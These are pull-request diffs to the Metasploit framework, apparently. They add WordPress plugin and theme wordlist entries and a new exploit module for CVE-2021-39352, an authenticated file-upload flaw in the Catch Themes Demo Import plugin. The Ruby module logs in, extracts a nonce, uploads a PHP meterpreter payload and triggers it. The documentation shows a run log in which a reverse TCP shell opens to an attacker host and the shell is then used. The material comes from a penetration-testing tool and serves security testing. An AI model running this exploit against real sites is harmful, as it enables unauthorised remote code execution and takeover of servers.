@@ -78964,6 +79110,7 @@ what-template-am-i-using
 what-template-file-am-i-viewing
 what-the-cf7-which-contact-form-used-in-pagepost
 what-the-cron
+what-the-faq
 what-the-file
 what-the-template
 what-the-wp
@@ -82862,6 +83009,7 @@ wow-trk-affiliate-marketing-ad-rotator
 wowhead-powered
 wowhead-sidebar-search
 wowhead-tooltips
+wowholic-core
 wowpi
 wowpi-guild
 wowpress
@@ -90229,6 +90377,7 @@ wpblog-plus
 wpblogsync
 wpblox-compare-plans
 wpbmb-entrez
+wpbom
 wpbook
 wpbook-lite
 wpbooklist
@@ -90252,6 +90401,7 @@ wpbw-beaver-lister
 wpc-ajax-add-to-cart
 wpc-ajax-search
 wpc-antispambot
+wpc-brands
 wpc-buy-now-button
 wpc-change-default-email
 wpc-composite-products
@@ -90283,6 +90433,7 @@ wpc-shop-as-customer
 wpc-show-single-variations
 wpc-smart-notification
 wpc-smart-price-filter
+wpc-sticky-add-to-cart
 wpc-update-variations-in-cart
 wpc-variation-swatches
 wpc-variations-radio-buttons
@@ -91193,6 +91344,7 @@ wpsso-breadcrumbs
 wpsso-faq
 wpsso-inherit-parent-meta
 wpsso-organization
+wpsso-organization-place
 wpsso-plm
 wpsso-ratings-and-reviews
 wpsso-rest-api
@@ -91651,6 +91803,7 @@ xbox-live-avatar-widget
 xbox-live-gamer-profile-widget
 xbox-live-widget
 xbrander-pdf-document-brander
+xbulk-bulk-edit-bundle
 xc-authentication-plugin
 xca-widgets
 xcache
@@ -92018,6 +92171,7 @@ yandex-metrika
 yandex-money-button
 yandex-money-checkout
 yandex-news
+yandex-pay
 yandex-pinger
 yandex-share
 yandex-share-block

--- a/data/wordlists/wp-themes.txt
+++ b/data/wordlists/wp-themes.txt
@@ -364,6 +364,7 @@ adapter
 adaption
 adaptive
 adaptive-flat
+adarsa
 adbooster
 add-your-content-wordpress-theme
 adela
@@ -811,6 +812,7 @@ amaranthine
 amaryllo
 amateur
 amathambo
+amaz-store
 amazeblog
 amazica
 amazica-business
@@ -957,6 +959,7 @@ anime
 anime-crowds
 anime-days
 anime-desu
+anime-games
 anime-heaven
 anime-template-theme
 animepress
@@ -1441,6 +1444,7 @@ auctions
 auctor
 audacity-of-tanish
 audictive-ten
+audio-podcast
 audioman
 audiotheme-fourteen
 auenwald
@@ -1799,6 +1803,7 @@ baseline
 basepress
 baseshine
 basetheme
+bashir-rased
 basho
 basic
 basic-bikes-limited
@@ -2094,6 +2099,7 @@ bibliotecas
 bicbb
 bicubic
 bicycle
+bicycle-rental
 bicycleshop
 biddo
 bidhantech
@@ -2541,6 +2547,7 @@ blog-zone
 blog-zone-update
 blog0sphere
 blog2019
+blog22
 blog64
 blog99
 blog_and_blog-sultan
@@ -3147,6 +3154,7 @@ botanical
 bothainah
 botiga
 botticelli
+boundlessnews
 bouquet
 bourboneat
 boutique
@@ -3317,6 +3325,7 @@ bubbles-squared
 bubblewrap
 bubbly
 bubu
+buconz-starter
 buddha-theme
 buddhism
 buddyeleven
@@ -3719,6 +3728,7 @@ calabozo-design
 cali
 calibar
 calibration
+calico
 call-power
 callas
 callcenter
@@ -3740,6 +3750,7 @@ camel
 cameleon
 cameo
 camer
+camera-store
 cameron
 camille-vencert
 camise
@@ -3919,6 +3930,7 @@ cc-responsive
 ccblue
 ccovid-medical-lite
 ccr-stylo
+cctv-security
 cdb-technology
 ceascol
 cecorabelle
@@ -4196,6 +4208,7 @@ citylogic
 citypost
 cityscape
 civigreen
+civil-construction
 civilized
 cjanky
 claire
@@ -4878,6 +4891,7 @@ corponotch-consultant
 corponotch-law
 corponotch-medical
 corpopress
+corporacy
 corporal
 corporata-lite
 corporate
@@ -4938,6 +4952,7 @@ corporately-child
 corporatesource
 corporatetech
 corporatio
+corposet
 corpotec
 corpox
 corpoz
@@ -5020,6 +5035,7 @@ craft-blog-1-0-8
 craftblog
 crafted
 crafter
+craftnce
 crafty
 crafty-business
 crafty-cart
@@ -5073,6 +5089,7 @@ creativ-education
 creativ-kids-education
 creativ-kindergarten
 creativ-mag
+creativ-magazine
 creativ-montessori
 creativ-musician
 creativ-preschool
@@ -5358,6 +5375,7 @@ dancing-in-the-moonlight
 dandelion-dreams
 dandy
 danfe
+danica
 daniela
 danielle
 daniels-bootstrap-4
@@ -6101,6 +6119,7 @@ dustland-express-premium
 dustlandexpress
 dvd-reviews
 dvm_writer
+dw-bionix
 dw-caution
 dw-cosmos
 dw-cryosis
@@ -6141,6 +6160,7 @@ dystopia
 dz306-simple-farsi-theme
 dzdivs-wp
 dzegmerti
+dznews
 dzonia-lite
 dzstandard
 dztra
@@ -6343,6 +6363,7 @@ educacionbe
 educamp
 educamp9
 educate
+educateup
 education
 education-academia
 education-base
@@ -6546,6 +6567,7 @@ elephant-mania
 elephent
 eletheme
 eleto
+elevate-wp
 elevation-lite
 eleven-21
 elf
@@ -6677,6 +6699,7 @@ enjoymini
 enjoynews
 enjoynow
 enjoypress
+enjoystyle
 enjoytube
 enjoyvideo
 enlighten
@@ -6714,6 +6737,7 @@ envestpro-lite
 envince
 envira
 environment
+environmental-green
 envision
 envo-blog
 envo-business
@@ -6741,6 +6765,7 @@ ep
 ephemeris
 epic
 epic-base
+epic-construction
 epione
 epiphany-digital-blue-peace
 epira-free-version
@@ -7245,6 +7270,7 @@ female
 femina
 feminine
 feminine-blog
+feminine-business
 feminine-fashion
 feminine-lifestyle
 feminine-lite
@@ -7314,6 +7340,7 @@ fight-against-corruption
 fighter
 figureground
 fildisi
+film-maker-lite
 filmix
 filmmaker
 filmmakerarthurmian
@@ -8376,6 +8403,7 @@ golden-glow
 golden-moments
 golden-portal
 golden-ratio
+goldly
 golf-algarve
 golf-theme
 golf-theme-by-nikola
@@ -9019,6 +9047,7 @@ heavencake-uri-httpscolorlib-comwpthemesactivello
 heavenly
 heavy
 heavy-wordpress-theme
+hebe
 hedwix-outreach
 heed
 heera
@@ -9033,6 +9062,7 @@ hellish-simplicity
 hello
 hello-academy
 hello-d
+hello-education
 hello-elementor
 hello-elementor-child
 hello-eletheme-uri-httpselementor-comhello-themeutm_sourcewp-themesutm_campaigntheme-uriutm_mediumwp-dash
@@ -9208,6 +9238,7 @@ home-construction
 home-design-blog
 home-design-blog-2
 home-furniture
+home-guard
 home-loan
 home-page
 home-pets
@@ -9235,6 +9266,7 @@ hoop
 hooshmandi
 hoot-business
 hoot-du
+hoot-porto
 hoot-ubix
 hoot-uno
 hoovey
@@ -11516,6 +11548,7 @@ magic-blog
 magic-corp
 magic-dust
 magic-magazine
+magic-notes
 magic-tree
 magical
 magicbackground
@@ -12032,6 +12065,7 @@ megastar
 megaz
 megazine
 megla
+megla-lite
 megnu-dustydisks
 megnu-ubuntu
 megumi-theme-miyako
@@ -12130,6 +12164,7 @@ mesopotamia
 mess-desk-v2
 messenger
 messina-blog
+meta-news
 meta-store
 meta_s2
 metal-urbano
@@ -13433,6 +13468,7 @@ news-vibrant-plus
 news-viral
 news-way
 news-x
+newsable
 newsanchor
 newsbd24
 newsbeat
@@ -13488,6 +13524,7 @@ newsmagfree
 newsmagjn
 newsmagz
 newsmandu-magazine
+newsmedia
 newsmin
 newsnote
 newson
@@ -13569,6 +13606,7 @@ nexproperty
 next
 next-event
 next-fall
+next-legit-news
 next-level-blog
 next-saturday
 next-saturday-1-0
@@ -14473,6 +14511,7 @@ paddle
 padhag
 padhang
 padma
+padma-blog
 padma-lite
 padwriting
 padwriting-theme
@@ -15039,6 +15078,7 @@ pitra
 pits
 pitter
 pixamag
+pixatres
 pixel
 pixel-2011
 pixel-linear
@@ -15264,6 +15304,7 @@ portfolioline
 portfoliolite
 portfolioo
 portfolioo_jude
+portfoliox
 portfolium
 portframe
 portico
@@ -15306,6 +15347,7 @@ power-business
 power-house
 power-mag
 power-magazine
+power-news
 powerblog-lite
 powerclub-lite
 powerful
@@ -15471,6 +15513,7 @@ problue
 probluezine
 probrand
 proclouds
+procorp
 prodigy-store
 produccion-musical
 producer
@@ -15732,6 +15775,7 @@ quick-reading
 quick-sales
 quick-vid
 quickchic
+quicker
 quickly
 quickpic
 quickpress
@@ -16233,6 +16277,7 @@ responsive-plus-plus
 responsive-skeleton
 responsive-small-business
 responsive-tabs
+responsive-techup
 responsive-test
 responsive-twentyten
 responsive-wordpress-theme
@@ -16555,6 +16600,7 @@ rowling
 rowling-custom
 royal
 royal-blog
+royal-elementor-kit
 royal-legendary
 royal-magazine
 royal-news
@@ -16960,6 +17006,7 @@ sell-my-ebooks
 sellbetter
 sellebooks
 seller
+selleradise-lite
 selma
 semanitic-ui-developer-edition
 semanitic-ui-for-wordpress-beta-2
@@ -17265,6 +17312,7 @@ shopisla
 shopisle
 shopix
 shopiyo
+shopkeeper-ecommerce
 shopline
 shopmax
 shopone
@@ -18641,6 +18689,7 @@ strategie-temp
 strategie3
 strategie_ug
 stratum
+stratusx
 strawberry-blend
 strawberry-blend-10
 streak
@@ -18945,6 +18994,7 @@ swift-lite
 swift-premium-lite
 swiftbiz
 swiftbiz-lite
+swiftly
 swiftmag
 swiftone
 swiftpress
@@ -19209,6 +19259,7 @@ teczilla-corporate
 teczilla-creative
 teczilla-dark
 teczilla-finance
+teczilla-organization
 teczilla-portfolio
 teczilla-startup
 teczilla-trading
@@ -19868,6 +19919,7 @@ tour
 tour-agency
 tour-operator
 tour-package
+tour-traveler
 tourable
 tourag
 touring-zone
@@ -21304,6 +21356,7 @@ webet
 webgist
 webgrapple
 webify
+webinar-education
 webjunk
 weblizar
 weblizar-brown
@@ -21385,6 +21438,7 @@ wen-corporate
 wen-travel
 wen-travel-blog
 wen-travel-dark
+wen-travel-modern
 wepora
 werka
 west
@@ -22200,6 +22254,7 @@ xsimply
 xt-corporate-lite
 xtempt
 xtheme
+xtra-free
 xtraroofing
 xtron
 xwb
@@ -22410,6 +22465,7 @@ zeesynergie
 zeetasty
 zeevision
 zeko-lite
+zelia
 zelle-lite
 zemez
 zemix

--- a/documentation/modules/exploit/multi/http/wp_catch_themes_demo_import.md
+++ b/documentation/modules/exploit/multi/http/wp_catch_themes_demo_import.md
@@ -1,11 +1,13 @@
 ## Vulnerable Application
 
-The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to arbitrary file
-uploads via the import functionality found in the `~/inc/CatchThemesDemoImport.php` file,
-due to insufficient file type validation.
+The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated
+arbitrary file uploads via the import functionality found in the `~/inc/CatchThemesDemoImport.php`
+file, due to insufficient file type validation.
 
 Of note, the check functionality may not detect the version of `Catch Themes Demo Import` due
 to the readme file not containing the proper version number line.
+
+Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/http/wp_catch_themes_demo_import.md
+++ b/documentation/modules/exploit/multi/http/wp_catch_themes_demo_import.md
@@ -15,8 +15,8 @@ to the readme file not containing the proper version number line.
 1. Do: `set rhosts`
 1. Do: `set username`
 1. Do: `set password`
-2. Do: `run`
-3. You should get a shell.
+1. Do: `run`
+1. You should get a shell.
 
 ## Options
 

--- a/documentation/modules/exploit/multi/http/wp_catch_themes_demo_import.md
+++ b/documentation/modules/exploit/multi/http/wp_catch_themes_demo_import.md
@@ -1,0 +1,66 @@
+## Vulnerable Application
+
+The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to arbitrary file
+uploads via the import functionality found in the `~/inc/CatchThemesDemoImport.php` file,
+due to insufficient file type validation.
+
+Of note, the check functionality may not detect the version of `Catch Themes Demo Import` due
+to the readme file not containing the proper version number line.
+
+## Verification Steps
+
+1. Install the plugin to wordpress
+1. Start msfconsole
+1. Do: `use exploits/multi/http/wp_catch_themes_demo_import`
+1. Do: `set rhosts`
+1. Do: `set username`
+1. Do: `set password`
+2. Do: `run`
+3. You should get a shell.
+
+## Options
+
+### USERNAME
+
+Username of the account which has post privileges. Defaults to `admin`.
+
+### PASSWORD
+
+Password of the account which has post privileges. Defaults to `admin`
+
+## Scenarios
+
+### Wordpress Catch Themes Demo Import 1.6.1 on Wordpress 5.4.8 running on Ubuntu 20.04
+
+```
+resource (catch_theme.rb)> use exploits/multi/http/wp_catch_themes_demo_import
+[*] Using configured payload php/meterpreter/reverse_tcp
+resource (catch_theme.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (catch_theme.rb)> set username admin
+username => admin
+resource (catch_theme.rb)> set password admin
+password => admin
+resource (catch_theme.rb)> set verbose true
+verbose => true
+resource (catch_theme.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (catch_theme.rb)> run
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/catch-themes-demo-import/readme.txt
+[!] The service is running, but could not be validated. Could not identify the version number
+[*] Ajax Nonce: 11a5dba010
+[*] Uploading payload filename: Y5LBjS3t.php
+[*] Triggering payload at wp-content/uploads/2021/12/Y5LBjS3t.php
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[+] Deleted Y5LBjS3t.php
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:34002 ) at 2021-12-21 20:01:30 -0500
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : wordpress2004
+OS          : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
+Meterpreter : php/linux
+```

--- a/modules/exploits/multi/http/wp_catch_themes_demo_import.rb
+++ b/modules/exploits/multi/http/wp_catch_themes_demo_import.rb
@@ -1,0 +1,129 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Plugin Catch Themes Demo Import RCE',
+        'Description' => %q{
+          The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to arbitrary file
+          uploads via the import functionality found in the ~/inc/CatchThemesDemoImport.php file,
+          due to insufficient file type validation.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Ron Jost', # edb
+          'Thinkland Security Team' # listed on wordfence's site
+        ],
+        'References' => [
+          [ 'EDB', '50580' ],
+          [ 'CVE', '2021-39352' ],
+          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2617555/catch-themes-demo-import/trunk/inc/CatchThemesDemoImport.php' ],
+          [ 'URL', 'https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39352' ],
+          [ 'WPVDB', '781f2ff4-cb94-40d7-96cb-90128daed862' ]
+        ],
+        'Platform' => ['php'],
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2021-10-21',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),
+    ]
+  end
+
+  def check
+    return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?
+
+    checkcode = check_plugin_version_from_readme('catch-themes-demo-import', '1.8')
+    if checkcode == CheckCode::Safe
+      print_error('catch-themes-demo-import not a vulnerable version')
+    end
+    return checkcode
+  end
+
+  def exploit
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    if cookie.nil?
+      vprint_error('Invalid login, check credentials')
+      return
+    end
+
+    # grab the ajax_nonce
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'themes.php'),
+      'method' => 'GET',
+      'cookie' => cookie,
+      'keep_cookies' => 'false', # for some reason wordpress gives back an unauth cookie here, so ignore it.
+      'vars_get' => {
+        'page' => 'catch-themes-demo-import'
+      }
+    })
+    fail_with(Failure::Unreachable, 'Site not responding') unless res
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
+    /"ajax_nonce":"(?<ajax_nonce>[a-z0-9]{10})"/ =~ res.body
+    fail_with(Failure::UnexpectedReply, 'Unable to find ajax_nonce on page') unless ajax_nonce
+    vprint_status("Ajax Nonce: #{ajax_nonce}")
+
+    random_filename = "#{rand_text_alphanumeric(6..12)}.php"
+    vprint_status("Uploading payload filename: #{random_filename}")
+
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part('ctdi_import_demo_data', nil, nil, 'form-data; name="action"')
+    multipart_form.add_part(ajax_nonce, nil, nil, 'form-data; name="security"')
+    multipart_form.add_part('undefined', nil, nil, 'form-data; name="selected"')
+    multipart_form.add_part(
+      payload.encoded,
+      'application/x-php',
+      nil,
+      "form-data; name=\"content_file\"; filename=\"#{random_filename}\""
+    )
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'keep_cookies' => 'true',
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    )
+    fail_with(Failure::Unreachable, 'Site not responding') unless res
+    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
+    register_file_for_cleanup(random_filename)
+    print_status("Triggering payload at wp-content/uploads/#{Date.today.year}/#{Date.today.month}/#{random_filename}")
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', Date.today.year, Date.today.month, random_filename),
+      'method' => 'GET',
+      'keep_cookies' => 'true'
+    )
+  end
+end

--- a/modules/exploits/multi/http/wp_catch_themes_demo_import.rb
+++ b/modules/exploits/multi/http/wp_catch_themes_demo_import.rb
@@ -17,9 +17,11 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Wordpress Plugin Catch Themes Demo Import RCE',
         'Description' => %q{
-          The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to arbitrary file
-          uploads via the import functionality found in the ~/inc/CatchThemesDemoImport.php file,
-          due to insufficient file type validation.
+          The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated
+          arbitrary file uploads via the import functionality found in the
+          ~/inc/CatchThemesDemoImport.php file, due to insufficient file type validation.
+          Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
+          During testing this timeout was roughly 5min.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -54,7 +56,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-          'Reliability' => [ REPEATABLE_SESSION ]
+          # https://support.shufflehound.com/forums/topic/i-cant-use-the-one-click-demo-installer/#post-31770
+          # re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
+          'Reliability' => [ UNRELIABLE_SESSION ]
         }
       )
     )
@@ -73,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if checkcode == CheckCode::Safe
       print_error('catch-themes-demo-import not a vulnerable version')
     end
-    return checkcode
+    checkcode
   end
 
   def exploit
@@ -123,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => multipart_form.to_s
     )
     fail_with(Failure::Unreachable, 'Site not responding') unless res
-
+    fail_with(Failure::UnexpectedReply, 'Plugin not ready to process new payloads. Please retry in a few minutes.') if res.code == 200 && res.body.include?('afterAllImportAJAX')
     fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
     # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails.  This
     # is actually positive as it won't display a malformed item anywhere in the UI.  Simply writes our payload, then exits (non-gracefully)
@@ -140,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_file_for_cleanup(random_filename)
     print_status("Triggering payload at wp-content/uploads/#{Date.today.year}/#{Date.today.month}/#{random_filename}")
     send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', Date.today.year, Date.today.month, random_filename),
+      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', Date.today.year, Date.today.month.to_s.rjust(2, '0'), random_filename),
       'method' => 'GET',
       'keep_cookies' => 'true'
     )

--- a/modules/exploits/multi/http/wp_catch_themes_demo_import.rb
+++ b/modules/exploits/multi/http/wp_catch_themes_demo_import.rb
@@ -40,6 +40,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' => [
           [ 'Automatic Target', {}]
         ],
+        # we leave this out as typically php.ini will bail before 350mb, and payloads are small enough to fit as is.
+        # 'Payload'        =>
+        # {
+        #   # https://plugins.trac.wordpress.org/browser/catch-themes-demo-import/tags/1.6.1/inc/CatchThemesDemoImport.php#L226
+        #   'Space' => 367_001_600, # 350mb
+        # }
         'DisclosureDate' => '2021-10-21',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
@@ -117,7 +123,20 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => multipart_form.to_s
     )
     fail_with(Failure::Unreachable, 'Site not responding') unless res
+
     fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
+    # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails.  This
+    # is actually positive as it won't display a malformed item anywhere in the UI.  Simply writes our payload, then exits (non-gracefully)
+    #
+    # [Fri Dec 24 16:48:00.904980 2021] [php7:error] [pid 440128] [client 192.168.2.199:38107] PHP Fatal error:  Uncaught Error: Class 'XMLReader' not found in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php:123
+    # Stack trace:
+    # #0 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php(331): CatchThemes\\WPContentImporter2\\WXRImporter->get_reader()
+    # #1 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(80): CatchThemes\\WPContentImporter2\\WXRImporter->import()
+    # #2 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(137): CTDI\\Importer->import()
+    # #3 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/CatchThemesDemoImport.php(306): CTDI\\Importer->import_content()
+    # #4 /var/www/wordpress/wp-includes/class-wp-hook.php(292): CTDI\\CatchThemesDemoImport->import_demo_data_ajax_callback()
+    # #5 /var/www/wordpress/wp-includes/class-wp-hook.php(316): WP_Hook->apply_filters()
+    # #6 /var/www/wordpress/wp-includes/plugin.php(484): WP_ in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php on line 123
     register_file_for_cleanup(random_filename)
     print_status("Triggering payload at wp-content/uploads/#{Date.today.year}/#{Date.today.month}/#{random_filename}")
     send_request_cgi(


### PR DESCRIPTION
This PR adds cve-2021-39352, an authenticated wordpress plugin RCE against Catch Themes Demo Import < 1.8
Pretty simple exploit, login, grab a nonce, upload payload, execute it. have a nice day.

Looks like the plugin doesn't have a good readme file though, so the check does find a file, but not the version.  This is prob fine.  I think in the future it may be a good idea to implement an authenticated `check_plugin_version_from_plugin_page` to check form the authenticated pages.  Another PR on another day.

Also went ahead and updated the wordpress themes, and plugins files.

## Verification

- [ ] Install the plugin to wordpress (https://downloads.wordpress.org/plugin/catch-themes-demo-import.1.6.1.zip)
- [ ] Start msfconsole
- [ ] Do: `use exploits/multi/http/wp_catch_themes_demo_import`
- [ ] Do: `set rhosts`
- [ ] Do: `set username`
- [ ] Do: `set password`
- [ ] Do: `run`
- [ ] You should get a shell.
- [ ] check docs are good
